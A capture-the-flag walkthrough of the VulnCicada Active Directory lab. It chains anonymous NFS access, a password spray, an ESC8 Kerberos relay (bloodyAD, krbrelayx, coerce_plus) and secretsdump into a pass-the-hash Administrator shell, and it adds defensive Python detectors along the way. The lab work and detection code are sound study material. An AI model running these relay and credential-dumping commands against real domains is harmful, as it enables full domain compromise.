Myles Nieman

VulnCicada

Overview

VulnCicada is a medium Windows Active Directory box built around NFS exposure and AD CS abuse. A world-readable NFS profiles share leaks a list of domain users; one profile contains an image file that hides a plaintext credential. Spraying that password (with proper Kerberos authentication against the FQDN) identifies the account owner as Rosie.Powell. From there, Certipy finds the CA is vulnerable to ESC8 — Web Enrollment is enabled without signing enforcement. Combining bloodyAD DNS record insertion, krbrelayx, and netexec coerce_plus relays the DC machine account’s Kerberos authentication to the Web Enrollment endpoint, producing a certificate that can be used to recover the Administrator NTLM hash via secretsdump.

Path: anonymous NFS → image credential → Rosie.Powell → ESC8 Kerberos relay → DC certificate → Administrator NTLM → domain admin.

Enumeration

$ nmap 10.129.235.233
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
2049/tcp open  nfs
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

VulnCicada target connectivity verified

Nmap scan results for cicada.vl

The scan fingerprints a Windows domain controller at cicada.vl / DC-JPQ225.cicada.vl. Two things stand out immediately: NFS on 2049 (unusual for a DC) and the standard AD CS cluster. I added both the short name and the FQDN to /etc/hosts.

10.129.235.233 cicada.vl DC-JPQ225.cicada.vl

SMB

$ smbclient -L \\\\cicada.vl\\

SMB share listing for cicada.vl

Nothing accessible anonymously.

NFS

$ showmount -e cicada.vl

NFS exports listing showing the /profiles share

$ sudo mount cicada.vl:/profiles /mnt/nfs_share/

NFS profiles share mounted successfully

The mounted share contains home directories for eleven accounts:

Administrator, Daniel.Marshall, Debra.Wright, Jane.Carter, Jordan.Francis,
Joyce.Andrews, Katie.Ward, Megan.Simpson, Richard.Gibbons, Rosie.Powell, Shirley.West

NFS share directory listing showing all profile directories
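The two findings that matter from the mounted share are the directory names (a ready-made username list) and which files the mount exposes to any client. The following audit script is an added example, not part of the original writeup: it builds a small constructed tree that mimics the profiles layout and reports both. The directory and file names are borrowed from the share listing above; the modes are assumptions for the sake of the demo.

```python
import os
import stat
import tempfile


def build_sample_tree():
    """Construct a throwaway tree shaped like the profiles share (constructed, not lab data)."""
    root = tempfile.mkdtemp(prefix="profiles_")
    layout = {
        "Administrator": {"vacation.png": 0o644},   # readable by everyone
        "Rosie.Powell": {"marketing.png": 0o600},   # owner-only, like the file that returned Permission denied
        "Jane.Carter": {},                           # empty profile, still leaks the username
    }
    for user, files in layout.items():
        user_dir = os.path.join(root, user)
        os.makedirs(user_dir)
        for fname, mode in files.items():
            path = os.path.join(user_dir, fname)
            with open(path, "wb") as fh:
                fh.write(b"\x89PNG\r\n\x1a\n")  # PNG magic bytes only; no real image content
            os.chmod(path, mode)
    return root


def audit_profiles_share(root):
    """Report usernames leaked by directory names and files readable by 'other'.

    Returns {"usernames": [...], "world_readable": [...]} with paths relative to root.
    """
    usernames = sorted(
        entry for entry in os.listdir(root) if os.path.isdir(os.path.join(root, entry))
    )
    world_readable = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fname in filenames:
            path = os.path.join(dirpath, fname)
            if os.stat(path).st_mode & stat.S_IROTH:
                world_readable.append(os.path.relpath(path, root))
    return {"usernames": usernames, "world_readable": sorted(world_readable)}


if __name__ == "__main__":
    sample_root = build_sample_tree()
    report = audit_profiles_share(sample_root)
    print("usernames leaked by directory names:", ", ".join(report["usernames"]))
    print("files readable by any client:", ", ".join(report["world_readable"]) or "none")
```

Pointed at a real mount instead of the sample tree, the same function shows what an anonymous client sees. Mode bits are only a control if the server squashes root: the sudo chmod step later in this writeup works precisely because it did not, so an export that reaches a DC's profile directories should be restricted by client address rather than by file modes.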

Foothold — Credential in NFS Image

AS-REP Roasting attempt

With a clean username list I tried AS-REP roasting first:

$ GetNPUsers.py -usersfile userlist -request -format hashcat -outputfile ASREProastables.txt -dc-ip 10.129.235.233 'cicada.vl/'

AS-REP roasting results — no valid hashes returned

No pre-auth disabled accounts.

Image files on the share

A recursive look at the share shows that only two directories contain files: Administrator/vacation.png and Rosie.Powell/marketing.png. The Administrator image copies fine, but Rosie’s file returns Permission denied. Elevating locally with sudo chmod on the NFS-mounted path works around it:

$ sudo chmod +r /mnt/nfs_share/Rosie.Powell/marketing.png
$ cp /mnt/nfs_share/Rosie.Powell/marketing.png .

Administrator’s vacation.png — the image itself

The website on port 80 offers nothing useful:

Port 80 website — unhelpful

Opening marketing.png reveals embedded plaintext credentials:

marketing.png contains a password in plain sight

Password spray

Spraying the recovered password against the user list via plain SMB produces no hits. The DC enforces Kerberos-only authentication (NTLM disabled), so the spray needs the FQDN and -k:

$ nxc smb DC-JPQ225.cicada.vl -u userlist -p "Cicada123" -d "cicada.vl" -k

Password spray with Kerberos auth — Rosie.Powell matches

Rosie.Powell is the owner of the credential.
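Because the domain is Kerberos-only, the spray above shows up on the DC as a burst of Kerberos pre-authentication failures (Event ID 4771, failure code 0x18) for many different accounts from one source, followed by a single TGT issuance (Event ID 4768) for the account that matched. The detector below is an added example, not from the writeup: it runs over constructed, simplified log lines (the usernames are the ones from the NFS listing; the timestamps, addresses and the one-line event format are assumptions) and flags any source address that fails pre-auth for at least `threshold` distinct users inside one window, listing any success that followed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample of flattened Security-log fields; not real lab telemetry.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01Z EventID=4771 TargetUserName=Daniel.Marshall IpAddress=10.10.14.8 Status=0x18
2024-05-01T10:00:01Z EventID=4771 TargetUserName=Debra.Wright IpAddress=10.10.14.8 Status=0x18
2024-05-01T10:00:02Z EventID=4771 TargetUserName=Jane.Carter IpAddress=10.10.14.8 Status=0x18
2024-05-01T10:00:02Z EventID=4771 TargetUserName=Jordan.Francis IpAddress=10.10.14.8 Status=0x18
2024-05-01T10:00:02Z EventID=4771 TargetUserName=Joyce.Andrews IpAddress=10.10.14.8 Status=0x18
2024-05-01T10:00:03Z EventID=4771 TargetUserName=Katie.Ward IpAddress=10.10.14.8 Status=0x18
2024-05-01T10:00:03Z EventID=4768 TargetUserName=Rosie.Powell IpAddress=10.10.14.8 Status=0x0
2024-05-01T10:00:04Z EventID=4771 TargetUserName=Megan.Simpson IpAddress=10.10.14.8 Status=0x18
2024-05-01T10:07:00Z EventID=4771 TargetUserName=Jane.Carter IpAddress=10.10.20.5 Status=0x18
2024-05-01T10:07:30Z EventID=4771 TargetUserName=Jane.Carter IpAddress=10.10.20.5 Status=0x18
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) Status=(?P<status>\S+)$"
)


def parse_events(text):
    """Parse the constructed one-line format into dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        ts = datetime.strptime(match["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append({
            "ts": ts,
            "eid": int(match["eid"]),
            "user": match["user"].lower(),
            "ip": match["ip"],
            "status": match["status"].lower(),
        })
    return events


def detect_spray(text, window_seconds=60, threshold=5):
    """Return {source_ip: finding} for sources that fail pre-auth for many distinct users.

    A spray is many users / few attempts each; repeated failures for one user from one
    source (a brute force) deliberately does not trip this rule.
    """
    by_ip = defaultdict(list)
    for event in parse_events(text):
        by_ip[event["ip"]].append(event)

    window = timedelta(seconds=window_seconds)
    findings = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        failures = [e for e in events if e["eid"] == 4771 and e["status"] == "0x18"]
        for i, first in enumerate(failures):
            # Distinct accounts failing pre-auth within one window starting at this failure.
            users = {e["user"] for e in failures[i:] if e["ts"] - first["ts"] <= window}
            if len(users) < threshold:
                continue
            window_end = first["ts"] + window
            # Any TGT actually issued to this source inside the same window is the likely hit.
            successes = sorted({
                e["user"] for e in events
                if e["eid"] == 4768 and first["ts"] <= e["ts"] <= window_end
            })
            findings[ip] = {
                "window_start": first["ts"].isoformat(),
                "distinct_users": sorted(users),
                "successes": successes,
            }
            break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for ip, finding in detect_spray(SAMPLE_EVENTS).items():
        print(f"{ip}: {len(finding['distinct_users'])} accounts failed pre-auth from "
              f"{finding['window_start']}; TGT issued for {finding['successes'] or 'nobody'}")
```

The window and threshold are tuning knobs; on a real DC the 4771 volume from one address against a dozen distinct accounts in a few seconds is rare enough that a low threshold is safe, and the 4768 correlation is what turns "someone is spraying" into "and this is the account they got".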

Privilege Escalation — ESC8 via Kerberos Relay

Discovering the CA

Checking shares as Rosie reveals the AD CS infrastructure is present:

$ nxc smb DC-JPQ225.cicada.vl -u rosie.powell -p "Cicada123" -d "cicada.vl" -k --shares

Share listing confirms AD CS is in scope

Running Certipy to enumerate vulnerabilities produces Kerberos errors when a plain DC IP is used; passing the FQDN as -dc-ip and specifying the nameserver resolves them:

$ certipy find -k -vulnerable -text -dc-ip DC-JPQ225.cicada.vl -no-pass -ns 10.129.235.234

Certipy find output identifying the CA and vulnerabilities

The CA cicada-DC-JPQ225-CA has Web Enrollment enabled with Request Disposition: Issue and no signing enforced — the conditions for ESC8.

ESC8 confirmed — Web Enrollment enabled without signing enforcement

Kerberos relay chain

ESC8 via Kerberos relay requires three moving parts: a DNS record pointing to the attacker host, a relay listener, and a coercion trigger.

1. Add a DNS record pointing to our host (using bloodyAD since dnstool.py produced errors):

$ python3 bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p 'Cicada123' \
    -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.8

2. Start krbrelayx to relay incoming Kerberos authentication to the Web Enrollment endpoint:

$ python3 krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' \
    --adcs --template DomainController -v 'CICADA'

3. Coerce DC authentication using netexec coerce_plus (PetitPotam and Coercer did not work here):

$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus \
    -o LISTENER=dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

Coerce_plus module triggering the DC’s outbound authentication

krbrelayx captures the relay and obtains a certificate

PFX certificate saved to disk

The relay succeeds and krbrelayx saves a .pfx certificate for the DC machine account.
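The first moving part of this chain leaves a durable artifact: a new record in the AD-integrated DNS zone whose name begins with the DC's hostname, carries a long alphanumeric suffix, and points at a host that is not a domain controller. That combination is cheap to watch for in a periodic zone dump. The checker below is an added example, not part of the writeup: the record name and attacker address are taken from the commands above, while the other records, the known-DC set and the DC address set are constructed assumptions.

```python
import re

# Constructed sample of a zone export as (record_name, address) pairs.
# The fourth entry reproduces the record created in the writeup; the rest are made up.
SAMPLE_ZONE = [
    ("dc-jpq225", "10.129.235.233"),
    ("www", "10.129.235.233"),
    ("fileserver01", "10.129.235.40"),
    ("dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA", "10.10.14.8"),
    ("dc-jpq225-backup", "10.129.235.41"),
]

# Assumed inventory: DC hostnames and the addresses a DC-prefixed name may legitimately resolve to.
KNOWN_DCS = {"dc-jpq225"}
DC_ADDRESSES = {"10.129.235.233"}

# A suffix made only of base64-alphabet characters and at least min_suffix long.
# Real hostnames contain hyphens or are short, so this is a strong signal by itself.
SUFFIX_RE = re.compile(r"^[A-Za-z0-9+/=]+$")


def flag_dns_records(records, known_dcs=KNOWN_DCS, dc_addresses=DC_ADDRESSES, min_suffix=20):
    """Return findings for record names that mimic a DC hostname with a long opaque suffix.

    Each finding records which DC the name mimics, the suffix length, the address the
    record points to, and whether that address is a known DC address.
    """
    findings = []
    for name, address in records:
        lowered = name.lower()
        for dc in known_dcs:
            dc = dc.lower()
            if not (lowered.startswith(dc) and len(lowered) > len(dc)):
                continue
            suffix = name[len(dc):]
            if len(suffix) < min_suffix or not SUFFIX_RE.match(suffix):
                continue
            findings.append({
                "record": name,
                "mimics": dc,
                "suffix_len": len(suffix),
                "address": address,
                "address_is_dc": address in dc_addresses,
            })
    return findings


if __name__ == "__main__":
    for finding in flag_dns_records(SAMPLE_ZONE):
        where = "a DC address" if finding["address_is_dc"] else "a NON-DC address"
        print(f"{finding['record']} mimics {finding['mimics']} "
              f"(+{finding['suffix_len']} opaque chars) and resolves to {where}: "
              f"{finding['address']}")
```

Feed it the output of a scheduled zone export and alert on any hit; because ordinary domain users can create records in an AD-integrated zone by default (which is exactly what the bloodyAD step relies on), a hit whose address is not a DC is worth treating as an active relay setup rather than a naming accident. A record such as dc-jpq2251 or dc-jpq225-backup is deliberately not flagged: the suffix is short or contains a hyphen.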

Root

With the DC machine account certificate, authenticate as that account with Certipy to obtain a Kerberos ticket and its NT hash, then use the ticket with secretsdump to retrieve the Administrator's NTLM hash:

Certipy authenticates with the PFX to obtain the NT hash

$ secretsdump.py cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -k -no-pass -just-dc-user Administrator

secretsdump extracts the Administrator NTLM hash

Pull a TGT for Administrator using the hash, then get a shell with wmiexec:

$ getTGT.py cicada.vl/Administrator -hashes :85a0da53871a9d56b6cd05deda3a5e87 -dc-ip 10.129.235.250
$ wmiexec.py cicada.vl/Administrator@dc-jpq225.cicada.vl -k -no-pass

wmiexec session as Administrator

Domain compromised — Administrator shell on DC-JPQ225

Takeaways

  • Exposed NFS on a DC is an unusual and high-value target — world-readable profile directories can leak usernames, files, and even embedded credentials without touching SMB at all.
  • ESC8 requires three coordinated steps (DNS poisoning, relay listener, coercion trigger) but netexec coerce_plus makes the coercion piece straightforward when PetitPotam falls short. The Kerberos-only domain environment also meant every tool needed explicit FQDN targeting and -k flags rather than NTLM.